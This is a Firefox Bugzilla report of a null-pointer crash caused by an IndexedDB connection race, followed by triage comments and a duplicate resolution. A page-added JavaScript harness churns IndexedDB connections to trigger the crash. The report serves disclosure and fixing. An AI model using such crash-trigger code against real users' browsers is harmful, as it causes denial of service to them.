Closed Bug 1253942 Opened 8 years ago Closed 8 years ago

Null Pointer Exception in IndexedDB - mozilla::dom::indexedDB::(anonymous namespace)::DatabaseConnection::GetCachedStatement

Categories

(Core :: Storage: IndexedDB, defect)

Version: 44 Branch
Type: defect
Priority: Not set
Severity: normal
RESOLVED DUPLICATE of bug 1195149

People

(Reporter: nick, Unassigned)

Details

(Keywords: crash, csectype-nullptr, testcase)

Attachments

(1 file)

Attached file poc.html
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36

Steps to reproduce:

Please see the PoC to reproduce the issue.


Actual results:

The browser crashed citing a null pointer dereference.


Expected results:

A race condition in IndexedDB leads to a null pointer exception. By repeatedly opening, performing operations, and closing IndexedDB database connections, it is possible to trigger a null pointer exception that crashes the browser. The PoC was tested on Mac OS X 10.11 with the release binary of Firefox 44.0.2 and can cause a crash within a few minutes of opening the poc. Attempts to reproduce the issue on Ubuntu 15.10 and Windows 7 were unsuccessful.

The offending line is:

dom/indexedDB/ActorsParent.cpp:6700

This becomes an issue when “mStorageConnection” is set to “nullptr” in dom/indexedDB/ActorsParent.cpp:10300.

A crash report is available at: https://crash-stats.mozilla.com/report/index/e8160559-442f-413c-a294-444852160306

I'm not certain if this represents a significant security threat, but I will mark it as such just in case.
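The attached poc.html is not reproduced on this page. The following is an added example, written for this page and not the reporter's PoC or Mozilla code, of the churn pattern the report describes: several connections that each open the database, queue a batch of operations, close the connection while the transaction is still live, and repeat. The database name, store name, record shape, batch size and worker count are assumptions; the harness only starts when an `indexedDB` global exists, so loading it in a page is the intended use.

```javascript
// Added example (not the attached poc.html): an IndexedDB churn harness built
// only from the reporter's description of the trigger. All names and sizes
// below are assumptions, not values taken from the original PoC.
const DB_NAME = "churn-db";        // assumed database name
const STORE = "items";             // assumed object store name
const RECORDS_PER_CYCLE = 50;      // assumed batch size per open/close cycle
const PARALLEL_CONNECTIONS = 4;    // assumed number of overlapping connections

// Deterministic record builder; pure so its output can be checked outside a browser.
function makeRecord(cycle, i) {
  return { id: cycle * RECORDS_PER_CYCLE + i, cycle, payload: "x".repeat(64) };
}

// Wrap an IDBRequest in a promise.
function requestToPromise(req) {
  return new Promise((resolve, reject) => {
    req.onsuccess = () => resolve(req.result);
    req.onerror = () => reject(req.error);
  });
}

// Open the database, creating the object store on first use.
function openDb() {
  const req = indexedDB.open(DB_NAME, 1);
  req.onupgradeneeded = () => {
    const db = req.result;
    if (!db.objectStoreNames.contains(STORE)) {
      db.createObjectStore(STORE, { keyPath: "id" });
    }
  };
  return requestToPromise(req);
}

// One cycle: open, queue a batch of puts and a read, then close() while the
// transaction is still in flight. Per spec the connection is torn down once
// the transaction finishes, which is exactly the open/operate/close churn
// the reporter describes, driven from the content side.
async function runCycle(cycle) {
  const db = await openDb();
  const tx = db.transaction(STORE, "readwrite");
  const finished = new Promise((resolve) => {
    tx.oncomplete = tx.onabort = tx.onerror = resolve;
  });
  const store = tx.objectStore(STORE);
  for (let i = 0; i < RECORDS_PER_CYCLE; i++) {
    store.put(makeRecord(cycle, i));
  }
  const readBack = requestToPromise(store.get(makeRecord(cycle, 0).id));
  db.close();                      // close with the transaction still live
  await readBack.catch(() => {});  // a failed read ends the cycle, not the run
  await finished;
  return cycle + 1;
}

// Each worker cycles independently so that connections overlap; key ranges
// are kept disjoint across workers so puts never collide.
async function worker(id, cycles) {
  let cycle = id * 100000;
  for (let n = 0; n < cycles; n++) cycle = await runCycle(cycle);
  return cycle;
}

// Start PARALLEL_CONNECTIONS workers, each running `cycles` iterations.
function runStress(cycles = 1000) {
  const workers = [];
  for (let w = 0; w < PARALLEL_CONNECTIONS; w++) workers.push(worker(w, cycles));
  return Promise.all(workers);
}

// Only kick off inside a browser page; Node has no indexedDB global.
if (typeof indexedDB !== "undefined") {
  runStress().then(() => console.log("all cycles finished without a crash"));
}
```

To run it for longer, raise the `cycles` argument or wrap `runStress()` in a loop; the reporter's report says the crash appeared within minutes on the affected build, so a run measured in hours without a crash, as the later comments describe, is the negative result to look for.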

Does this still reproduce using Nightly (v47, https://nightly.mozilla.org/ ) ?
Group: firefox-core-security → core-security
Component: Untriaged → DOM: IndexedDB
Flags: needinfo?(nick)
Product: Firefox → Core

I just ran my PoC on nightly for about two hours without a crash. I'll let it run until tomorrow AM, but it seems like this issue is fixed in nightly.
Flags: needinfo?(nick)

I couldn't reproduce on Mac Fx 44.0.2
Group: core-security → dom-core-security

I never saw any additional crashes on the nightly version.

Is there any information I can provide that might assist in helping you reproduce this problem?
I retested with Firefox 45 and can't reproduce the crash. My guess is this is fixed now, and may have only been a problem on very specific setups.

I ran this overnight on trunk with no success.

It certainly happens in the wild, because this is bug 1195149 and bug 1172822.
Kyle, should we dupe this to either bug 1195149 or bug 1172822?
Flags: needinfo?(khuey)
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Flags: needinfo?(khuey)
Resolution: --- → DUPLICATE
